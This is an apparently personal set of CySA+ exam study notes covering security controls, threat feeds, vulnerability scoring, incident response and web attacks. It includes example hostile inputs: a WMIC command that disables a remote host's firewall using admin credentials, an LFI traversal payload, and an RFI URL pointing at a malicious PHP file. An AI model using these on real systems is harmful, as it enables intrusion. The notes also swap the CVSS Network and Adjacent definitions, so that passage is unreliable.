CompTIA CySa+ - jdru.dev

Sec+ Expires August 17, 2025 # My personal prep for CySa+ exam Not complete, just notes to develop my understanding in prep ### 1a Understanding CS leadership concepts #### SANs policy https://www.sans.org/information-security-policy/ #### Service Level Objective SLO: SLOs are measurable standards organizations set to ensure the security of their network and assets. - **Purpose:** - Assess how well security operations protect the organization. - Provide assurance to customers and stakeholders about system and data security. - **Characteristics:** - Must be realistic and achievable. - Often reflect latest security trends and best practices. - **Common Security-Related SLOs:** - **Mean Time to Detect (MTTD):** How quickly threats are identified. - **Mean Time to Recover (MTTR):** How quickly systems recover after an incident. - **Time to Patch:** Duration between patch release and application. - **Role of Policies and Compliance:** - Compliance teams rely on policy documents and SLOs to measure performance and adherence. - Actionable tasks are derived from policies to ensure work is compliant. - **Risk Management & Governance Interaction:** - Risk managers identify new risks and expect governance teams to update policies accordingly. - Policy documents provide the foundation for managing and enforcing security rules. - **Example Process Flow:** 1. Compliance reviews patch management and reports “time to patch.” 2. Risk managers identify increasing delays in patching over months. 3. Risk managers find change requests for patch delays approved by department leaders. 4. Governance team responds by requiring two management approvals for patch delays. 5. Governance updates the change management policy to enforce this new rule. #### NIST 4 T's - Risk management Avoid (terminate), Accept (tolerate), Mitigate (treatment), Transfer (transfer) Risks need follow up risks #### Threat modelling Identifying threat actors, and their TTPs ATTACK MITRE Microsoft threat modelling tool ![[Microsoft threat modelling tool 1.png]] Two pronged attack via social engineering. Usually backing up a prompt with a follow up for extra effectiveness. Show forged badged, urgency voice or email and follow up with phone call. Example; email for 250k then, deep fake phone call to encourage authorise payment. Threat modelling requires: knowledge of system components knowledge of attack methods knowledge of appro mitigations knowledge of laws and regulations knowledge of business impacts **Collaboration required** ---------- ### 1b Control types and methods #### Control classes: technical (logical controls) -system (hard, soft, firm -ware) e.g Firewall, av, operational (people controls) -primarily people e.g security guards, training programs managerial (oversight) -give oversight of systems e.g Nessus, risk register #### Function: preventive -eliminate or reduce the likelihood. Acts before an attack takes place e.g ACL on firewall, anti-malware detective: -record and identify any attempted intrusion eg. logs, centralised logs, siem, IDS corrective: -used after an attack, or to reduce impact of an attack e.g patching vulnerabilities exploited, backup software compensating: -using different methodology or technology due to a limitation e.g increasing monitoring if you cant implement MFA responsive: -incident response control. Allows to id, detect, and response e.g SIEM, honeypot. SOC ---SUMMARY: - **Preventive:** Stop attacks before they happen - **Detective:** Identify attacks or suspicious activities - **Responsive:** Actions taken _after_ detection to limit damage - **Corrective:** Fix or remediate issues caused by attacks - **Compensating:** Alternative controls when primary controls can’t be used Patch management is a preventive control as it involves regularly updating systems to prevent exploitation of vulnerabilities. However, the application of specific patches in response to identified vulnerabilities is a corrective control, as it remedies an existing security weakness external resources: [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf) Security & Privacy Controls for Information Systems and Organisations [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf) Protecting Controlled Unclassified Information in Non-federal Systems and Organizations [https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/](https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/) ISO 27001 Standards [https://www.cisecurity.org/controls](https://www.cisecurity.org/controls) CIS Controls #### Managing Attack Surface STIGS Security Technical Implementation Guides - https://public.cyber.mil/stigs/ CIS benchmarks ##### Footprinting Footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system. Methods of footprinting Footprinting is the technique used for gathering information about computer systems and the entities they belong to. To get this information, a hacker might use various tools and technologies. This information is very useful to a hacker who is trying to crack a whole system. https://web-check.as93.net/ https://whoxy.com ##### passive recon Bugbounty reports : https://nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/ ### 1c patch management #### configuration management tools: chef puppet ansible terraform ### 2a threat actor concepts nation-state organised crime hacktivist insider threat script kiddie supply chain access ### 2b id active threats indicators of attack (IoAs), and confidence levels provided by threat information data to identify threats, understand exploits, and reveal an attacker’s activities. UEBA User Entity Behavioural Analysis Information Sharing and Analysis Centers (ISACs) #### Honeypots [https://blueclouddrive.com/generate](https://blueclouddrive.com/generate) Generate your Canarytoken here [https://canarytokens.org/generate](https://canarytokens.org/generate) Canarytokens is a free tool that helps you discover you've been breached by having attackers announce themselves. The tokens allow you to implant traps. [https://www.smokescreen.io/](https://www.smokescreen.io/) Deception technology to blanket your network with decoys to catch the serious bad attackers [https://www.stationx.net/canarytokens/](https://www.stationx.net/canarytokens/) [https://whiteclouddrive.com/generate](https://whiteclouddrive.com/generate) [https://d3fend.mitre.org/](https://d3fend.mitre.org/) #### Exploit databases https://www.exploit-db.com/ #### Threat Feeds - Cybersecurity and Infrastructure Security Agency: https://www.cisa.gov/cybersecurity - NIST Computer Security Resource Center: https://csrc.nist.gov/ - FBI InfraGard: https://www.infragard.org/ - SANS Internet Storm Center: https://isc.sans.edu/ - Virus Total Intelligence: https://www.virustotal.com/gui/intelligence-overview - Cisco Talos Intelligence: https://www.talosintelligence.com/ - SPAMHAUS: https://www.spamhaus.org/ - Crowdstrike: https://www.crowdstrike.com/products/threat-intelligence/ - AlienVault Open Source Threat Exchange: https://otx.alienvault.com/ - Anomali: https://www.anomali.com/products/threatstream - Mandiant: https://www.mandiant.com/advantage/threat-intelligence - Abuse.CH: https://abuse.ch/ ### 2c exploring threat hunting concepts misconfig hunting -search for misconfigured systems, services, applications that can be exploited isolated network hunting -air gapped network, exploiting vulnerabilities in connected system business-critical asset hunting -vulns and threats that could impact critical infrastructure that could severely degrade business operations use uncoder.io to turn sigma into detection decoy methods/active defence: honeypots ### 3a Reviewing system and network architecture concepts Subkey Name - Description •SAM - Security Accounts Manager (SAM) stores username information for accounts used on the current computer •SECURITY - Linked to the security database of the domain the current user is logged onto •SOFTWARE - Contains settings for software and the Windows operating system •SYSTEM - Contains settings for drivers and file systems •DEFAULT - Contains settings for the LocalSystem account profile #### Virtulisation: type1 ESXI type2 VirtualBox application virtualisation - thin app containerization includes all necessary components - kernel shared #### SD-WAN Network functions: - control plane - makes decisions about how traffic should be prioritised and secured and where it should be switched, routing tables - Where should the traffic go - data plane - handles actual switching nd routing of traffic and imposition of ACLs /firewall - move this packet here - based off of the control plane - management plane - monitoring traffic and status - configuration using the management plane you can config the control plane which inturn impacts the data plane on how packets are handled #### Zero - trust https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf Always verify and authorise network edge has become more blurred therefore zta has become more crucial The foundation of SASE... ZTA is the security model that drives the SASE framework ##### Deperimeterisation cause for ZTA and SASE drivers: cloud remote work mobile devices outsourced contractors wi-f #### SASE Secure access secure edge - framework built on access through resources, users, services, and workflows rather than through network boundaries SWG, SD-WAN, FWaaS, ZTA Cloud native #### ZTA and SASE ZTA is the rulebook for the development of SASE - which is a cloud service framework ### 3b Exploring identity and access management Federation - trust another company to manage their account and access our resources OpenID SAML Transitive Trust If A trusts resource B and Resource B trusts Resource C then A Trusts C CASB enable SSO enforce RBAC, scan malware, monitor and audit user/device activity ### 3c Data loss prevention Remediation is the action the DLP software takes when it detects a policy violation. The following remediation mechanisms are typical: •Alert only—The copying is allowed, but the management system records an incident and may alert an administrator. •Block—The user is prevented from copying the original file but retains access to it. The user may or may not be alerted to the policy violation, but it will be logged as an incident by the management engine. •Quarantine—Access to the original file is denied to the user (or possibly any user). This might be accomplished by encrypting the file in place or by moving it to a quarantine area in the file system. •Tombstone—The original file is quarantined and replaced with one describing the policy violation and how the user can release it again. Public Key Infrastructure Public key infrastructure (PKI) provides a suite of tools designed to support public/private key management, integrity checks via digital signatures, and authentication, as well as non-repudiation of users and/or devices through the use of private key encryption. PKI offers the opportunity to centralize digital certificate standards and the methods used to provide cryptographic services. This is important as it helps improve compliance with established policy and/or regulatory requirements relative to cryptography. PKI provides the mechanisms required to confidently identify the owners of public keys. PKI issues digital certificates guaranteed by a trusted certificate authority (CA). Trusted CAs are preestablished by recording their information within operating system certificate stores, within browsers, and by using special hardware storage components. Digital certificates are foundational to HTTPS traffic. Secure Sockets Layer (SSL) Inspection Secure socket layer (SSL) inspection is the process of inspecting encrypted HTTPS traffic. Without SSL inspection, network administrators cannot monitor encrypted traffic for threats, making HTTPS traffic an easy method for attackers to avoid detection. SSL inspection is also essential for verifying that website certificates are valid, helping protect against on-path (man-in-the-middle) attacks, where an attacker intercepts communications between two parties, and detecting traffic encrypted with anything other than a trusted third-party certificate. SSL inspection also helps enforce organizational policies, ensuring that employees comply with acceptable use policies and do not attempt to access restricted content or share/upload restricted data. SSL inspection is often accomplished by installing digital certificates on end devices that allow encrypted traffic to be intercepted, decrypted, and inspected by security tools or software before being re-encrypted and forwarded to the intended destination. Web proxies, load balancers, next-gen firewalls, and similar devices all support this capability. #### Log ingestion • DEBUG: used for debugging purposes • INFO: used for informative messages • WARNING: used to indicate a potential problem ERROR: used to indicate a serious problem • CRITICAL: used to indicate a critical problem ### 4a Process improvement in security operations SIEM and SOAR Playbooks and runbooks MISP:https://www.misp-project.org/ Single pane of glass webhook and API PLugins and apps ### 5a Compliance requirements ISO / NIST, Legal contracts PCI DSS AoC attestation of compliance - doc to demonstrates and org compliance produced by QSA quality security assessor, or Merchant , CMMI Capability Maturity Model Integration (CMMI) Capability Maturity Model Integration (CMMI) describes five levels of maturity within the operational or software capabilities of an organization. Measuring software capabilities is the most common use, and this assessment is frequently required by many federal contracts. A CMMI assessment is very focused on identifying that all work is defined through well-established processes. The results of the assessment will establish the maturity level, or score, of an organization. The scores include the following: • Level 1: Initial—Processes do not exist, and work is reactive in nature. • Level 2: Managed—Many work activities are defined via processes, but work is still frequently reactive in nature. • Level 3: Defined—The majority of work is well defined via processes, and proactive measures are in place. • Level 4: Quantitatively Managed—All work is well defined via processes, proactive measures are in place, and the work outputs are tracked and analyzed. • Level 5: Optimizing—Work is well defined via processes Cloud security alliance STAR - assessment owasp [https://owasp.org/www-project-webgoat/](https://owasp.org/www-project-webgoat/) [https://owasp.org/www-project-juice-shop/](https://owasp.org/www-project-juice-shop/) Try Hack Me Room Owasp top 10 [https://tryhackme.com/room/owasptop10](https://tryhackme.com/room/owasptop10) Try Hack Me Room Owasp Juice Shop [https://tryhackme.com/room/owaspjuiceshop](https://tryhackme.com/room/owaspjuiceshop) [https://owasp.org/www-community/Vulnerability_Scanning_Tools](https://owasp.org/www-community/Vulnerability_Scanning_Tools) [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/) [https://owasp.org/www-project-proactive-controls/](https://owasp.org/www-project-proactive-controls/) [https://github.com/OWASP/wstg/tree/master/document](https://github.com/OWASP/wstg/tree/master/document) OWASP Testing guide very extensive [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/) GDPR latest changes: Preparing for 2025: Key Compliance Areas for Businesses - UK GDPR: UK and EU compliance 2025 1. Legitimate Interest Assessments (LIAs) •Integral to data processing under UK and EU GDPR. •Conduct LIAs reflecting nuanced differences post-Brexit. •Key components of an LIA: •Clearly outline the legitimate interest. •Demonstrate necessity of data processing. •Prove data subject’s rights do not override these interests. •Regularly review LIAs to align with regulatory updates. • 2. Data Transfer Impact Assessments (DTIAs) •Essential for cross-border data transfers post-Brexit. •Evaluate protections for personal data transferred outside UK/EU. •Consider frameworks like the Data Privacy Framework for UK-US transfers. •Stay prepared for potential legal status changes. • 3. Data Protection by Design and Default • Integrate data privacy measures into all business processes. • Conduct regular Data Privacy Impact Assessments (DPIAs) for high-risk activities. • Ensure only necessary data is processed and access is limited. • Align activities with GDPR principles. • 4. Maintaining Records of Processing Activities (RoPAs) •Mandatory for significant or high-risk data processing. •Provide a clear picture of the data lifecycle. •Regularly update RoPAs to reflect evolving guidelines. ### 5b Understanding vuln scanning methods internal vs external inside vs outside ##### Vuln scan features: ###### credentialed/noncredentialed credentialed : gives greater insight to vulnerabilities on devices offer most comprehensive of evaluations noncredentialed : low impact on device, and gives insight to vulnerabilities that an attack might be able to scope. Additionally much simpler to implement ###### agent/agentless agent : allows collection of data via the endpoint to then be assessed for vulns. Less restricted via firewalls and reduces load on scanner. Also introduces an attack vector and application to patch agentless : uses protocol such as WMI, SNMP, and SSH which might be restricted by firewalls, but are the simplest to implement ###### active/passive active : interact with device or software to id vulns e.g banner grabbing, content ennum, web app scanner (Nessus, openVAS, Nexpose, Qualys) passive : without direct interaction with device or software for example network pcap - insecure protocols, cleartext credentials, inadequate encryption (Zeek, Tenable PVS) ###### Criticality ranking custom scoring for prioritisation of remediation efforts. Custom rankings VPR -Tenable, CVSS ###### Mapping and enum Most scanners will do host discovery ##### Analysis methods map/discovery ids devices connected to network - id rogure devices device fingerprinting - id specific details about devices - focused on individual device for better understanding of the purpose vendor, software versions - vulns static analysis - manual inspection of source code to id vulns. Also reviewing network diagrams and config files dynamic analysis - vuln scan softwre, pen testing, evaluating via manual tasks (burp suite) fuzzing is unknown environment tests - inject malform data reverse engineering - deconstructing code/hardware determine how crafted. Threat actors reverse engineer patch to discover undisclosed vulnerabilities compliance scan and reg requirements ##### hardening disablement of unneeded interfaces bluetooth, management, wifi, ethernet disablement of unneeded services - like remote access disablement of uneeded ports self-encrypting drives disablement of unneeded accounts CIS provides benchmarks for hardening devices DoD SCAP tool runs STIG benchmarks ##### Config baselines CIS critical security controls DOD STIG cat 1 immediate, cat 2 possible, cat 3 degrade controls ( Confidentiality, availability, and integrity) ### 5c Exploring Special considerations in Vuln scanning Segmentation, server based scanner needs to be able to communicate accross subnets, agentless needs to be able to send reports back to server. IDS, IPS might block or generate alerts ###### Performance considerations: -ID OS for vuln scans - automatically done typically -Scanning interval (regularly to ID new vulns) -Scan speed -Vuln database if the quality of the database is low then what's the point -type of scan, port, vuln, config -authentication more comprehensive but can use more resource. -FP important to report and manage FP ##### Data sensitivity levels A date inventory or data map where data is stored an its sensitivity. Clear view of data for enabling protections ##### Operational technology (OT) OT describes the technology. ICS is a focuses OT system, rest are functional components. | Component | Role | Relation | | ---------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------ | ------------------------------ | | **PLC (Programmable Logic Controller)** | The **core controller** for individual devices/machinery. Takes input from sensors and issues output to actuators. | Hardware-level control | | **SCADA (Supervisory Control and Data Acquisition)** | Provides **centralized, remote monitoring** and control across multiple PLCs/devices. | System-level supervision | | **HMI (Human-Machine Interface)** | The **user interface** for interacting with PLCs or SCADA systems locally. | Operator interface | | **Data Historian** | **Database/logging** system that stores all historical operational data. | Analysis, auditing, compliance | | Component | Role | | ------------------------------- | -------------------------------------------------------------------------------------------------------------- | | **Operational Technology (OT)** | Describes the class of technology. Similar like how IT is information technology. OT is operational technology | | **ICS** | Controls different stages of water purification: sedimentation, chlorination, distribution. | | **PLC** | Controls a pump: reads pressure sensor → starts/stops pump → opens valve. | | **SCADA** | In control room, visualizes all plant data from 10+ PLCs. Sends commands remotely. | | **HMI** | Operator panel next to pump. Staff sees water pressure & can press "start" or "stop". | | **Data Historian** | Stores all pressure readings, valve states, and alarms for the last 2 years. | ### 6a Understanding Vulnerability Scoring Concepts SCAP CVSSS VULN VALIUDATION CONTEXT #### SCAP languages Security Content Automation Protocol defined by STIG https://public.cyber.mil/stigs/scap/ standardise identification for flaws in software, misconfig, and vulns OVAL Open vuln and assessment language Consistent interpration of vulns ARF Asset reporting format -[https://oval.mitre.org/](https://oval.mitre.org/) info about assets XCCDF Extensible configuration checklist description format - https://csrc.nist.gov/files/pubs/ir/7275/r4/upd1/final/docs/nistir-7275r4_updated-march-2012_clean.pdf Benchmarks #### SCAP id schemes CPE - Common Platform Enumeration URI like id for software and software CVE - Common vuln and exposure CCE - configuration CVSS scoring > [!NOTE] 4 approx. questions on exam for CVSS > Calculate CVSS score ##### CVSS v2, v3, v4 https://www.first.org/cvss/ score from 0 - 10 0 None 0.1+ Low 4.0+ Medium 7.0+ High 9.0+ Critical ###### CVSS Metrics v3.1 Attack Vector (AV) Physical (P), Local (L), Adjacent network (A), or Network (N) The physical attack vector includes physical access to the system, such as accessing the device in person. The local attack vector consists of the ability to manipulate the system with local access, such as by using a USB-connected device. The network attack vector includes two distinct categories: adjacent network and network. Network (N) describes access via the same broadcast domain, whereas Adjacent network (A) refers to connectivity from any location. Network attacks include access to a system via the network, and include actions such as sending malicious data packets or instructions. The attack vectors help organizations identify the best way to implement protections. Attack Complexity (AC) High (H) or Low (L) Refers to the difficulty of the attack techniques used by a threat actor. Low indicates a straightforward attack, and high indicates a more complicated attack. Attack complexity is important to consider when evaluating the risk posed by a vulnerability. If the attack complexity is high, it may be difficult or impossible for a threat actor to exploit the vulnerability, thus reducing the risk. On the other hand, if the attack complexity is low, the risk posed by the vulnerability is greater. Privileges Required (PR) None (N), Low (L), or High (H) This represents permissions such as guest or anonymous (N), standard user (L), and administrator (H). User Interaction (UI) None (N) or Required (R) Whether an exploit of the vulnerability depends on some local user action, such as executing a file attachment. Scope (S) Unchanged (U) or Changed (C) This indicates whether the exploit affects only the local security context (U) or not (C). For example, a hypervisor vulnerability might allow an exploit from one VM to other VMs. Confidentiality (C), Integrity (I), and Availability (A) High (H), Low (L), or None (N) Where the metrics above assess exploitability, these three separate metrics measure impacts to the CIA triad. ### 6b Exploring vuln context considerations Validate, tp, fp, tn, tp CVSSv4 Categories: #prep-important Impact — The potential damage or harm caused by the vulnerability. Exploitability — The ease and likelihood of exploiting a vulnerability. Remediation — The cost and effort required to fix the vulnerability. Metrics: Scope — The number of systems and people affected by the vulnerability. Confidentiality — The extent to which data is disclosed. Integrity — The extent to which the system's functionality is changed or impaired. Availability — The extent to which a system is unavailable. Privacy — The extent to which the system's privacy is impacted. Operations — The extent to which the system's security is affected. Other — Any other relevant or important factors. ### 7a effective communication concepts #### Vuln management reporting org aware of risks of IT infrastructure Simple summaries of existing vulnerabilities details remediation steps #### Regulatory compliance reports Prepared by qualified personnel and often include information on policies and procedures #### internal compliance reports include assessments of endpoints to validate configuration pre required baselines #### KPI Incidents, detection times, indicators of compromise, threats, risk assessment, resource allocations cons: incidents are subjective, fps, inaccurate cs landscape data, irrelevant data, KPI based decision-making is complicated. #### SLO customer oriented operations - provide benchmark by which security operations can measure their performance ### 7b vuln reporting outcomes and action plans establish policies training compensating controls #### MoU Memorandum of Understanding is a legal document that outlines the terms and conditions of an agreement between two or more parties. It is an agreement that is not legally binding but serves as a document of understanding and good faith among the parties involved. A memorandum of understanding usually outlines the agreement’s objectives and each party’s duties and responsibilities. #### SLA legally binding contract between parties ### 8a understand incident response activities Plan, guidelines, resources, protocols, minimise impact prep, detection/analysis, contain, eradicate/recovery, post-incident policies - systems of org expectation and procedures for responding to security incidents procedures - orgs actions during incident response assessment of potential impacts - risk analyses and impact measure scope of identified incidents Playbooks: https://www.gov.scot/publications/cyber-resilience-incident-management/ Communication Plan - A secure method of communication between the IR team members is essential for successfully managing incidents. The team may require “out-of-band” or “off-band” channels that attackers cannot intercept. In a major intrusion incident, using corporate email or VoIP runs the risk that the adversary can intercept communications. One obvious method is via smartphones, but ideally, the messaging system should support end-to-end encryption, digital signatures, and encryption keys supplied by a system independent of the identity and access management systems used by the attacked environment. #### Tabletop exercise resource https://www.ncsc.gov.uk/section/exercise-in-a-box/overview [https://www.thecyberfish.com/](https://www.thecyberfish.com/) [https://circadence.com/](https://circadence.com/) https://irgame.ai/ #### post incident lesson learned report (LLR) or after-action report (AAR). #### BCDR Business continuity and Disaster recovery BC keep business running DR part of DR and immediate efforts ### 8b perform incident response activities #### Forensics chain of custody identification collection analysis reporting/presentation legal hold - keep data pending legal case eDiscovery - email logs text voicemail discovered via legal hold immediate impact -fines costs of assets ### 9a understanding incident response comms persons group or org that can affect or be affected by an particular incident Incidents impact stakeholders, and their areas of responsibility may be shaped by their knowledge of the incident. Keeping stakeholders informed helps them manage their responsibilities (affected by the incident) and often reveals information the responders may not have previously known, such as alternative processes, business relationships, impacts, and consequences. ### 9b analysing incident response activates autopsy analyse forensic image: [Autopsy - Digital Forensics](https://www.autopsy.com/) ### 10a Identifying malicious activity pcap samples domains https://www.whoxy.com/ ### 10b attack methodology frameworks Security Testing: https://www.isecom.org/OSSTMM.3.pdf killchain weaponisation delivery, exploit, installation, cc, actions diamond model - analyse an intrusion event ![[Diamond Model.png]] `E = { {Adversary,Cadversary}, `{Capability,Ccapability},` `{Infrastructure,Cinfrastructure},` `{Victim,Cvictim} = { {IP,Cip},` `{Port,Cport},` `{Process,Cprocess} },` `{Timestamp,Ctimestamp},` `{ ... } }` ![[Diamond model explained.png]] ![[Diamond model mapping.png]] #### Maltego Visualisation alternative: https://github.com/HuronOsint/OsintDistro%C2%A0In ### 12a analysing web vulns burp suite OWASP ZAP zed attack proxy [https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/](https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/) Nikto - web scanner https://www.cirt.net/Nikto2 Arachni - web scanner (new name : SCNR) [GitHub - Arachni/arachni: Web Application Security Scanner Framework](https://github.com/Arachni/arachni?tab=readme-ov-file) [Ecsypno Single Member P.C. – R&D and Consulting](https://ecsypno.com/) Immunity Debugger - analysis reverse engineer software GNU Debugger - analysis reverse engineer software ### 12b analyse cloud vulns ScoutSuite - audit tool github.com/nccgroup/ScoutSuite Prowler -audit tool github.com/toniblyx/prowler Pacu - exploit framework github.com/RhinoSecurityLabs/pacu rhinosecuritylabs.com/aws/cloudgoat-vulnerable-design-awsenvironment) ### 13a understanding scripting languages ksh unix ibm sh - bourne shell csh - c shell nuix oracle tcsh - C shell improved c shell bash - bourne again shell improved sh zsh - z shell expands on bash shell ##### Common: cat Display the content of a file. tail Display the last 10 lines of a file. head Display the first 10 lines of a file. touch Create an empty file. mkdir Create a directory. cp Copy a file (or directory). mv Move an object, such as a file. Also used to rename files and directories. rm Remove a file or directory. file Determine the type of a file. ls Display the contents of a directory. locate Search for files. Locate uses a database to improve speed and efficiency of searches. find Search for files by parsing the file system. wget Simple command to retrieve content from an HTTP server. curl Similar to wget but includes more sophisticated options. ###### admin: vi/vim A file editor for use in a terminal. Very popular but nonintuitive to use. su Substitute or switch user. sudo Precedes a command that requires elevated privileges. useradd Create a user account usermod Change the attributes of a user account. chmod Change the read, write execute attributes of a file or directory. chown Change permissions on a file or directory. mkfifo Similar in concept t ###### arithmatic: '+ Addition '- Subtraction '* Multiplication / Division % Modulus ##### operators: == Is equal to != Is not equal to -eq Alternative form of “is equal to” -ne Alternative form of “is not equal to” -gt Greater than -lt Less than -ge Greater than or equal to -le Less than or equal to #### Powershell #### WMIC Windows Management Instrumentation Command-Line (WMIC) is a powerful command line tool for performing administrative tasks and is well suited to scripting and automation. WMIC is part of the Windows Management Instrumentation (WMI) framework. It allows administrators to query, configure, and manage various system components, such as the operating system, hardware, and services. It also provides access to hardware and software information and can be used to manage and deploy applications remotely. The power and versatility of WMIC also makes it a valuable tool for attackers. One popular capability of WMIC is process call create which allows an authenticated user to start a command on a remote host. This example uses WMIC to issue a command on the remote host 10.0.2.6 to disable the Windows Firewall: wmic /node:10.0.2.6 /user:Administrator /password:CySAisC00L! process call create "cmd.exe /c netsh advfirewall set allprofiles state off" #### Python #### RegEx #### JSON #### XML ### 13b id malicious activity through analysis Event - Description Unusual network traffic - This can include unexpected spikes in network activity, communication with unfamiliar IP addresses, or unusual data flow patterns, which may indicate data exfiltration or command and control (C2) activity. Unexpected files or processes - This can include the appearance of unknown files or processes on a system, which may indicate malware or an attacker with access to a system. Unexpected communication - This can include unexpected communication between applications and systems, which may indicate attempts to exploit vulnerabilities, establish a C2 channel, or exfiltrate data. Communication with suspicious IP addresses - This can include communication with IP addresses that are known to be associated with malware, phishing campaigns, or other cyberattacks. Unusual communication protocols - This can include unusual communication protocols not typically used in the environment, which may indicate attempts to bypass security measures or establish a C2 channel. Large data transfers - This can include the transfer of large amounts of data to external IP addresses, which may indicate data exfiltration or the theft of sensitive data. Communication during unusual times - This can include communication during unusual hours or outside of normal business hours, which may indicate attempts to evade detection. Communication with suspicious domains - This can include contact with domains that are known to be associated with phishing campaigns, cyberattacks, or domains that have been recently registered. Encrypted communication - This can include encrypted or obfuscated communication, which may indicate attempts to hide malicious activity from security personnel. ### 14a exploring secure software dev practices SSDLC NIST Secure Software Development Framework - https://csrc.nist.gov/Projects/ ssdf Synopsis Secure SDLC 101 - https://www.synopsys.com/blogs/software-security/ secure-sdlc/ Microsoft SDL Practices - https://www.microsoft.com/en-us/securityengineering/ sdl/ Palo Alto: What Is Secure Software Development Lifecycle (Secure SDLC)? - https://www.paloaltonetworks.com/cyberpedia/what-is-secure-softwaredevelopment-lifecycle OWASP testing guide https://owasp.org/www-project-web-security-testing-guide/ Auth attack on-path password spray cred stuff ### 14b recommending controls to mitigate successful app attacks The heap is an area of memory allocated by the application during execution to store a variable. The heap can be used to store larger amounts of data than the stack, and variables are globally accessible to the process. A heap overflow can overwrite those variables and possibly allow arbitrary code execution. An example is a known vulnerability in Microsoft’s GDI+ processing of JPEG images https://kb.cert.org/vuls/id/297462. Also, management of objects in the heap is dependent on the process that created the object. Failing to de-allocate memory can cause a memory leak. An integer overflow is a type of software vulnerability that occurs when a program tries to store an integer value larger than the maximum value that the data type can hold, causing the value to wrap around to a lower value or overflow into adjacent memory space. This can cause the program to behave unpredictably, resulting in a security vulnerability if the overflowed value is used in a sensitive calculation or security check. Buffer overflow is a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory space. This can cause the program to crash or behave unpredictably. In some cases, it can be exploited by an attacker to execute arbitrary code or take control of the affected system. ##### LFI In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists on the hosting server. This is often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server’s file structure and executes a file. As in the directory traversal example, an attacker could gain control over the server by opening a command prompt. A common tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to bypass security mechanisms that automatically add a .php suffix to the request. This enables the attacker to access non-PHP files: /webpage.php?FONT=../../Windows/system32/cmd.exe%00 ##### RFI In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. An attacker could, for instance, force a parameter in a web page to call an external malicious link which includes the compromised file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter which has five different options, each one a different font type. The attacker can manipulate this parameter to inject an option that isn’t one of these five—and not only that, the attacker can point to an external URL that contains a malicious PHP file: /webpage.php?FONT=http://www.malice.foo/malware.php #### SSRF Server-side request forgery (SSRF) describes a type of web application security vulnerability that occurs when an attacker can send unauthorised requests from a vulnerable web application to other internal or external systems to gain unauthorised access. SSRF typically involves an attacker exploiting the web application’s ability to send HTTP requests to other systems, which are then abused to instruct “hidden” internal or external systems to provide the attacker with access to protected features or to steal information. https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Demo https://www.hacksplaining.com/exercises/ssrf & PortSwigger (the maintainers of Burp Suite) have published an excellent technical overview of SSRF. https://portswigger.net/web-security/ssrf A well-documented example of SSRF occured in the 2019 CaptialOne breach. https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/ Some common techniques used to exploit SSRF vulnerabilities include the following: §An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet. §An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems. §An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, which are used to launch further attacks. To prevent SSRF vulnerabilities, web application developers should consider the following: §Always validate user input—Ensure that all user input is properly validated and sanitised to prevent attackers from manipulating requests. §Allowed (formerly known as whitelist) hosts—Web applications should only be allowed to access trusted hosts and block all other requests by default. §Firewall and network segmentation—Network segmentation can prevent unauthorised access to internal systems when combined with firewalls to block traffic from unauthorised sources. §Secure coding practices—Developers should follow secure coding practices, such as using well established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings. #### Data poisoning Data poisoning is an attack that involves deliberately manipulating or corrupting data used in machine learning (ML) models or artificial intelligence (AI) systems. The goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results. Some strategies designed to mitigate the risk of data poisoning attacks include the following: §Data Validation—Before using data in an ML model, it is crucial to validate the quality and authenticity of the data to identify malicious or corrupted inputs that could result in a data poisoning attack. §Data Diversity—Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results. §Anomaly Detection—Using anomaly detection techniques can help identify unusual data patterns that may indicate a data poisoning attack. §Robust Models—Creating ML models resilient to unexpected inputs and adversarial attacks can help mitigate the risk of data poisoning. §Regular Model Testing and Auditing—Regularly testing and auditing ML models can help to identify issues and vulnerabilities, including evidence of data poisoning attacks. Data Poisoning Examples §Amazon Rekognition System—Researchers demonstrated a data poisoning attack on Amazon’s Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real world scenarios. §Google Maps—Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location’s data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether. Spam Filters—Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook. By doing so, they could send spam emails that would appear in users’ inboxes without being flagged as spam ### 14c Implementing Controls to Prevent Attacks ![[CySa preventing attacks.png]] --- # Mock Questions ## Scenario based ![[scenario 1 text.png]] ![[Scenario 1.png]] incorrect l8 exploriung incident response planning ![[Scenario 2 text.png]] ![[Scenario 2.png]] correct ![[Scenario 3 text.png]] ![[Scenario 3.png]] correct ## Questions I was unsure about Correct: 